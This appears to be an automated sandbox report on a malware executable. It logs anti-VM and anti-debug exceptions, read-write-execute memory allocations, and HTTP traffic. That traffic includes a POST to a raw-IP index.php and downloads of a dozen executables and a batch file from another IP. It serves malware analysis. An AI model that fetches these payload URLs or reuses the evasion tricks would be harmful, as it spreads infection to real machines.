__exception__ April 21, 2025, 9:59 a.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: 2m8357+0x3020b9 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 3154105 exception.address: 0x12420b9 registers.esp: 3800444 registers.edi: 0 registers.eax: 1 registers.ebp: 3800460 registers.edx: 20832256 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 57 bf 0c 9f fb 7b 29 f8 5f 56 be 02 c4 ed 56 exception.symbol: 2m8357+0x61aa4 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 400036 exception.address: 0xfa1aa4 registers.esp: 3800408 registers.edi: 1971192040 registers.eax: 16387574 registers.ebp: 4006408212 registers.edx: 15990784 registers.ebx: 16387066 registers.esi: 3 registers.ecx: 1971388416	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 04 24 83 ec 04 54 e9 d6 exception.symbol: 2m8357+0x60f34 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 397108 exception.address: 0xfa0f34 registers.esp: 3800412 registers.edi: 1971192040 registers.eax: 16420463 registers.ebp: 4006408212 registers.edx: 15990784 registers.ebx: 16387066 registers.esi: 3 registers.ecx: 1971388416	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 50 54 58 05 04 00 00 00 2d 04 00 00 00 87 04 exception.symbol: 2m8357+0x60ffc exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 397308 exception.address: 0xfa0ffc registers.esp: 3800412 registers.edi: 1971192040 registers.eax: 16391247 registers.ebp: 4006408212 registers.edx: 15990784 registers.ebx: 0 registers.esi: 353517416 registers.ecx: 1971388416	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 50 e9 ab 02 00 00 5f 56 ff 74 24 04 5e 8f 04 exception.symbol: 2m8357+0x62086 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 401542 exception.address: 0xfa2086 registers.esp: 3800412 registers.edi: 1971192040 registers.eax: 30485 registers.ebp: 4006408212 registers.edx: 15990784 registers.ebx: 16422112 registers.esi: 353517416 registers.ecx: 1971388416	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 00 00 00 00 57 53 c7 04 24 62 d7 6f 7d ff exception.symbol: 2m8357+0x6286f exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 403567 exception.address: 0xfa286f registers.esp: 3800412 registers.edi: 1971192040 registers.eax: 235753 registers.ebp: 4006408212 registers.edx: 15990784 registers.ebx: 16394388 registers.esi: 353517416 registers.ecx: 0	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 57 e9 15 fb ff ff be f2 ad b7 7f f7 d6 46 81 exception.symbol: 2m8357+0x1e44ae exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 1983662 exception.address: 0x11244ae registers.esp: 3800412 registers.edi: 0 registers.eax: 30467 registers.ebp: 4006408212 registers.edx: 2130566132 registers.ebx: 6094941 registers.esi: 82153 registers.ecx: 17974890	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 8e fe ff ff 81 ec 04 00 00 00 89 04 24 51 exception.symbol: 2m8357+0x1e5c27 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 1989671 exception.address: 0x1125c27 registers.esp: 3800408 registers.edi: 0 registers.eax: 28860 registers.ebp: 4006408212 registers.edx: 1329695299 registers.ebx: 559619585 registers.esi: 17978351 registers.ecx: 17974890	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 3c 24 55 e9 6c fe ff ff exception.symbol: 2m8357+0x1e5602 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 1988098 exception.address: 0x1125602 registers.esp: 3800412 registers.edi: 4294941336 registers.eax: 28860 registers.ebp: 4006408212 registers.edx: 1329695299 registers.ebx: 559619585 registers.esi: 18007211 registers.ecx: 1549541099	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 51 53 52 c7 04 24 1d 5f cf 3b 5b 81 f3 0a 2a exception.symbol: 2m8357+0x1eb923 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2013475 exception.address: 0x112b923 registers.esp: 3800408 registers.edi: 4468656 registers.eax: 18003046 registers.ebp: 4006408212 registers.edx: 18186 registers.ebx: 17981277 registers.esi: 17982998 registers.ecx: 1971442156	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 56 53 bb 6a fe 17 39 53 81 34 24 12 e2 f7 7d exception.symbol: 2m8357+0x1eb6fd exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2012925 exception.address: 0x112b6fd registers.esp: 3800412 registers.edi: 1259 registers.eax: 18031810 registers.ebp: 4006408212 registers.edx: 18186 registers.ebx: 17981277 registers.esi: 17982998 registers.ecx: 4294941516	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 57 89 14 24 89 0c 24 89 exception.symbol: 2m8357+0x1f3062 exception.instruction: in eax, dx exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2044002 exception.address: 0x1133062 registers.esp: 3800404 registers.edi: 1259 registers.eax: 1447909480 registers.ebp: 4006408212 registers.edx: 22104 registers.ebx: 1971327157 registers.esi: 18017821 registers.ecx: 20	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: 2m8357+0x1f31dc exception.address: 0x11331dc exception.module: 2m8357.exe exception.exception_code: 0xc000001d exception.offset: 2044380 registers.esp: 3800404 registers.edi: 1259 registers.eax: 1 registers.ebp: 4006408212 registers.edx: 22104 registers.ebx: 0 registers.esi: 18017821 registers.ecx: 20	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 15 39 2d 12 01 exception.symbol: 2m8357+0x1f269b exception.instruction: in eax, dx exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2041499 exception.address: 0x113269b registers.esp: 3800404 registers.edi: 1259 registers.eax: 1447909480 registers.ebp: 4006408212 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 18017821 registers.ecx: 10	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: cd 01 eb 00 6a 00 55 e8 03 00 00 00 20 5d c3 5d exception.symbol: 2m8357+0x1f7a9c exception.instruction: int 1 exception.module: 2m8357.exe exception.exception_code: 0xc0000005 exception.offset: 2063004 exception.address: 0x1137a9c registers.esp: 3800372 registers.edi: 0 registers.eax: 3800372 registers.ebp: 4006408212 registers.edx: 18053760 registers.ebx: 18054245 registers.esi: 3649746885 registers.ecx: 4294923098	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 da 00 00 00 29 d9 5b 01 f1 81 c1 6b 52 d5 exception.symbol: 2m8357+0x1f8908 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2066696 exception.address: 0x1138908 registers.esp: 3800408 registers.edi: 1259 registers.eax: 29699 registers.ebp: 4006408212 registers.edx: 2130531316 registers.ebx: 18055559 registers.esi: 11937 registers.ecx: 1568800768	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 57 c7 04 24 f7 9f ca 7a e9 12 00 00 00 53 89 exception.symbol: 2m8357+0x1f8bbe exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2067390 exception.address: 0x1138bbe registers.esp: 3800412 registers.edi: 1259 registers.eax: 29699 registers.ebp: 4006408212 registers.edx: 4294940476 registers.ebx: 18085258 registers.esi: 11937 registers.ecx: 2283	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 5f 00 00 00 33 1c 24 5c 55 89 1c 24 bb c3 exception.symbol: 2m8357+0x207397 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2126743 exception.address: 0x1147397 registers.esp: 3800412 registers.edi: 18118452 registers.eax: 28304 registers.ebp: 4006408212 registers.edx: 0 registers.ebx: 25318452 registers.esi: 1971262480 registers.ecx: 262633	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 81 c3 59 08 52 4d e9 2e 01 00 00 87 04 24 8b exception.symbol: 2m8357+0x20b9df exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2144735 exception.address: 0x114b9df registers.esp: 3800400 registers.edi: 4023944992 registers.eax: 28209 registers.ebp: 4006408212 registers.edx: 311541953 registers.ebx: 18133303 registers.esi: 1989380932 registers.ecx: 329673588	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 07 00 00 00 31 d6 e9 30 00 00 00 31 d2 e9 exception.symbol: 2m8357+0x20bb81 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2145153 exception.address: 0x114bb81 registers.esp: 3800404 registers.edi: 4023944992 registers.eax: 28209 registers.ebp: 4006408212 registers.edx: 311541953 registers.ebx: 18161512 registers.esi: 1989380932 registers.ecx: 329673588	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 50 e9 de 00 00 00 01 44 24 04 58 59 81 c1 04 exception.symbol: 2m8357+0x20b5e5 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2143717 exception.address: 0x114b5e5 registers.esp: 3800404 registers.edi: 4023944992 registers.eax: 28209 registers.ebp: 4006408212 registers.edx: 4294941836 registers.ebx: 18161512 registers.esi: 1989380932 registers.ecx: 1179202795	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 50 c7 04 24 25 58 9e 4f 81 24 24 e0 2a fd 7f exception.symbol: 2m8357+0x20c6a1 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2148001 exception.address: 0x114c6a1 registers.esp: 3800404 registers.edi: 4023944992 registers.eax: 18168505 registers.ebp: 4006408212 registers.edx: 1476736768 registers.ebx: 2146231623 registers.esi: 1989380932 registers.ecx: 34175232	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 6c 09 00 00 87 04 24 5c 89 0c 24 e9 bf 02 exception.symbol: 2m8357+0x20c55d exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2147677 exception.address: 0x114c55d registers.esp: 3800404 registers.edi: 4023944992 registers.eax: 18141349 registers.ebp: 4006408212 registers.edx: 226281 registers.ebx: 2146231623 registers.esi: 0 registers.ecx: 34175232	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 23 03 00 00 81 2c 24 f7 bd df 77 81 04 24 exception.symbol: 2m8357+0x210276 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2163318 exception.address: 0x1150276 registers.esp: 3800400 registers.edi: 4023944992 registers.eax: 27082 registers.ebp: 4006408212 registers.edx: 226281 registers.ebx: 305244883 registers.esi: 18151971 registers.ecx: 226281	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 50 c7 04 24 46 a3 7e 0e 81 2c 24 68 f3 80 90 exception.symbol: 2m8357+0x20feb7 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2162359 exception.address: 0x114feb7 registers.esp: 3800404 registers.edi: 4023944992 registers.eax: 27082 registers.ebp: 4006408212 registers.edx: 226281 registers.ebx: 305244883 registers.esi: 18179053 registers.ecx: 226281	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 51 e9 83 03 00 00 81 04 24 91 70 ff 59 5f 81 exception.symbol: 2m8357+0x20fb86 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2161542 exception.address: 0x114fb86 registers.esp: 3800404 registers.edi: 4023944992 registers.eax: 27082 registers.ebp: 4006408212 registers.edx: 0 registers.ebx: 562233704 registers.esi: 18155297 registers.ecx: 226281	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 50 57 bf 1d bd 0f 3f 89 f8 5f 29 c6 58 81 ee exception.symbol: 2m8357+0x22ec30 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2288688 exception.address: 0x116ec30 registers.esp: 3800368 registers.edi: 1202233320 registers.eax: 28637 registers.ebp: 4006408212 registers.edx: 2130566132 registers.ebx: 1229125602 registers.esi: 18276416 registers.ecx: 1568800768	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 68 45 21 d5 70 e9 d9 02 00 00 52 50 b8 04 00 exception.symbol: 2m8357+0x22e85e exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2287710 exception.address: 0x116e85e registers.esp: 3800372 registers.edi: 1202233320 registers.eax: 0 registers.ebp: 4006408212 registers.edx: 116969 registers.ebx: 1229125602 registers.esi: 18279581 registers.ecx: 1568800768	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 51 b9 04 cc bb 66 e9 1d fc ff ff 89 fe 5f 81 exception.symbol: 2m8357+0x2300f5 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2294005 exception.address: 0x11700f5 registers.esp: 3800368 registers.edi: 1202233320 registers.eax: 25625 registers.ebp: 4006408212 registers.edx: 116969 registers.ebx: 18282871 registers.esi: 18279581 registers.ecx: 85230820	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 56 89 04 24 56 e9 00 00 00 00 57 bf 37 8e 1d exception.symbol: 2m8357+0x230353 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2294611 exception.address: 0x1170353 registers.esp: 3800372 registers.edi: 604292945 registers.eax: 4294944280 registers.ebp: 4006408212 registers.edx: 116969 registers.ebx: 18308496 registers.esi: 18279581 registers.ecx: 85230820	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 56 c7 04 24 3a 49 c5 5a 89 04 24 68 80 7a ac exception.symbol: 2m8357+0x230f52 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2297682 exception.address: 0x1170f52 registers.esp: 3800372 registers.edi: 604292945 registers.eax: 322689 registers.ebp: 4006408212 registers.edx: 18314148 registers.ebx: 18308496 registers.esi: 4294941696 registers.ecx: 85230820	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 eb fc ff ff 9f 7c d1 be 3f 93 e7 9d 41 e4 exception.symbol: 2m8357+0x231c4f exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2301007 exception.address: 0x1171c4f registers.esp: 3800368 registers.edi: 18288848 registers.eax: 25961 registers.ebp: 4006408212 registers.edx: 1279364371 registers.ebx: 1711171134 registers.esi: 4294941696 registers.ecx: 2028334290	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 96 fa ff ff 29 d0 5a 01 c6 58 81 c6 04 00 exception.symbol: 2m8357+0x231818 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2299928 exception.address: 0x1171818 registers.esp: 3800372 registers.edi: 18291793 registers.eax: 25961 registers.ebp: 4006408212 registers.edx: 1279364371 registers.ebx: 0 registers.esi: 846176 registers.ecx: 2028334290	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 81 eb 94 4d fb 0d e9 0e f4 ff ff 89 1c 24 bb exception.symbol: 2m8357+0x23646f exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2319471 exception.address: 0x117646f registers.esp: 3800368 registers.edi: 18292694 registers.eax: 30975 registers.ebp: 4006408212 registers.edx: 0 registers.ebx: 18306890 registers.esi: 18291822 registers.ecx: 1969225870	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 50 c7 04 24 46 c6 3d 33 89 34 24 68 22 6f e7 exception.symbol: 2m8357+0x2362fd exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2319101 exception.address: 0x11762fd registers.esp: 3800372 registers.edi: 18292694 registers.eax: 4294939788 registers.ebp: 4006408212 registers.edx: 0 registers.ebx: 18337865 registers.esi: 18291822 registers.ecx: 966368653	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 12 09 00 00 33 04 24 e9 84 0a 00 00 87 3c exception.symbol: 2m8357+0x2368f8 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2320632 exception.address: 0x11768f8 registers.esp: 3800368 registers.edi: 18292694 registers.eax: 26612 registers.ebp: 4006408212 registers.edx: 1004011514 registers.ebx: 16394669 registers.esi: 18311099 registers.ecx: 966368653	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 34 24 e9 15 03 00 00 89 e2 55 e9 exception.symbol: 2m8357+0x236d04 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2321668 exception.address: 0x1176d04 registers.esp: 3800372 registers.edi: 18292694 registers.eax: 24811 registers.ebp: 4006408212 registers.edx: 0 registers.ebx: 16394669 registers.esi: 18314391 registers.ecx: 966368653	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 55 e9 9f 01 00 00 8b 1c 24 51 89 e1 81 c1 04 exception.symbol: 2m8357+0x240b6f exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2362223 exception.address: 0x1180b6f registers.esp: 3800368 registers.edi: 18406005 registers.eax: 26434 registers.ebp: 4006408212 registers.edx: 948097505 registers.ebx: 4063615605 registers.esi: 18351751 registers.ecx: 4063615605	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb b8 bc ac fd 1b 55 e9 92 02 00 00 81 c4 04 00 exception.symbol: 2m8357+0x240a21 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2361889 exception.address: 0x1180a21 registers.esp: 3800372 registers.edi: 0 registers.eax: 26434 registers.ebp: 4006408212 registers.edx: 948097505 registers.ebx: 81129 registers.esi: 18354869 registers.ecx: 4063615605	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 be 00 00 00 89 34 24 89 e6 e9 aa 01 00 00 exception.symbol: 2m8357+0x24247b exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2368635 exception.address: 0x118247b registers.esp: 3800368 registers.edi: 0 registers.eax: 18356902 registers.ebp: 4006408212 registers.edx: 948097505 registers.ebx: 81129 registers.esi: 18354869 registers.ecx: 143972650	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 99 08 00 00 68 cd 1c d1 19 89 1c 24 e9 37 exception.symbol: 2m8357+0x241cbd exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2366653 exception.address: 0x1181cbd registers.esp: 3800372 registers.edi: 0 registers.eax: 18389049 registers.ebp: 4006408212 registers.edx: 5892432 registers.ebx: 4294938312 registers.esi: 18354869 registers.ecx: 143972650	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 31 00 00 00 89 e1 81 c1 04 00 00 00 83 c1 exception.symbol: 2m8357+0x24803c exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2392124 exception.address: 0x118803c registers.esp: 3800372 registers.edi: 0 registers.eax: 32268 registers.ebp: 4006408212 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 18412221 registers.ecx: 1568800768	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 66 04 00 00 81 cf c8 c2 bb 6f 81 c7 24 61 exception.symbol: 2m8357+0x2476b0 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2389680 exception.address: 0x11876b0 registers.esp: 3800372 registers.edi: 0 registers.eax: 32268 registers.ebp: 4006408212 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 18383305 registers.ecx: 604292946	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 e4 04 00 00 35 c0 fe 2f 83 31 c1 8b 04 24 exception.symbol: 2m8357+0x2581ea exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2458090 exception.address: 0x11981ea registers.esp: 3800372 registers.edi: 18424919 registers.eax: 3434960208 registers.ebp: 4006408212 registers.edx: 0 registers.ebx: 18450730 registers.esi: 18424883 registers.ecx: 1568800768	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 68 28 08 52 4f e9 5b 00 00 00 50 e9 bd 01 00 exception.symbol: 2m8357+0x264349 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2507593 exception.address: 0x11a4349 registers.esp: 3800368 registers.edi: 18476292 registers.eax: 27805 registers.ebp: 4006408212 registers.edx: 1170440 registers.ebx: 18450730 registers.esi: 18424883 registers.ecx: 18496350	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 09 00 00 00 54 8f 04 24 e9 4c 00 00 00 68 exception.symbol: 2m8357+0x264438 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2507832 exception.address: 0x11a4438 registers.esp: 3800372 registers.edi: 18476292 registers.eax: 27805 registers.ebp: 4006408212 registers.edx: 3812597352 registers.ebx: 18450730 registers.esi: 0 registers.ecx: 18499227	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 56 e9 df f7 ff ff 56 c7 04 24 38 c8 55 1c 89 exception.symbol: 2m8357+0x2666f1 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2516721 exception.address: 0x11a66f1 registers.esp: 3800372 registers.edi: 4023721232 registers.eax: 384989288 registers.ebp: 4006408212 registers.edx: 0 registers.ebx: 4024393721 registers.esi: 18508246 registers.ecx: 734272745	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb e9 2d fa ff ff 51 89 1c 24 bb 04 00 00 00 e9 exception.symbol: 2m8357+0x27c4f8 exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2606328 exception.address: 0x11bc4f8 registers.esp: 3800372 registers.edi: 18622895 registers.eax: 4294942084 registers.ebp: 4006408212 registers.edx: 1440975187 registers.ebx: 899415641 registers.esi: 891985476 registers.ecx: 18592849	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 52 68 cb c0 7d 07 e9 53 00 00 00 c7 04 24 07 exception.symbol: 2m8357+0x2855eb exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2643435 exception.address: 0x11c55eb registers.esp: 3800372 registers.edi: 18622895 registers.eax: 322689 registers.ebp: 4006408212 registers.edx: 18658586 registers.ebx: 4294944044 registers.esi: 2005598220 registers.ecx: 1568800768	1
__exception__ April 21, 2025, 9:59 a.m.	stacktrace: exception.instruction_r: fb 57 e9 d1 01 00 00 89 0c 24 54 ff 34 24 59 83 exception.symbol: 2m8357+0x28e85c exception.instruction: sti exception.module: 2m8357.exe exception.exception_code: 0xc0000096 exception.offset: 2680924 exception.address: 0x11ce85c registers.esp: 3800368 registers.edi: 18310506 registers.eax: 26843 registers.ebp: 4006408212 registers.edx: 18670326 registers.ebx: 16910336 registers.esi: 18310505 registers.ecx: 3738837507	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (13 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.215.113.59/Dy5h4kus/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/fate/random.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/7453936223/LAc2heq.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/6336929412/Hmcm0Oj.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/5561582465/235T1TS.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/6691015685/xztOH3r.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/ebash/random.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/6629342726/i5Kz53x.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/7881515133/690BRuM.bat
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/6350437481/lBiQciH.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/5308024245/pOqYWAZ.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/5804781818/eZp5zCz.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.41/files/7709196889/hvof1h0.exe

Performs some HTTP requests (13 events)

request	POST http://185.215.113.59/Dy5h4kus/index.php
request	GET http://185.215.113.41/files/fate/random.exe
request	GET http://185.215.113.41/files/7453936223/LAc2heq.exe
request	GET http://185.215.113.41/files/6336929412/Hmcm0Oj.exe
request	GET http://185.215.113.41/files/5561582465/235T1TS.exe
request	GET http://185.215.113.41/files/6691015685/xztOH3r.exe
request	GET http://185.215.113.41/files/ebash/random.exe
request	GET http://185.215.113.41/files/6629342726/i5Kz53x.exe
request	GET http://185.215.113.41/files/7881515133/690BRuM.bat
request	GET http://185.215.113.41/files/6350437481/lBiQciH.exe
request	GET http://185.215.113.41/files/5308024245/pOqYWAZ.exe
request	GET http://185.215.113.41/files/5804781818/eZp5zCz.exe
request	GET http://185.215.113.41/files/7709196889/hvof1h0.exe

Sends data using the HTTP POST Method (1 event)

request

POST http://185.215.113.59/Dy5h4kus/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 503 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 21, 2025, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 9:58 a.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73dc1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 9:58 a.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d91000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 9:58 a.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d21000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2025, 9:58 a.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01080000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2025, 9:58 a.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d61000 process_handle: 0xffffffff	1
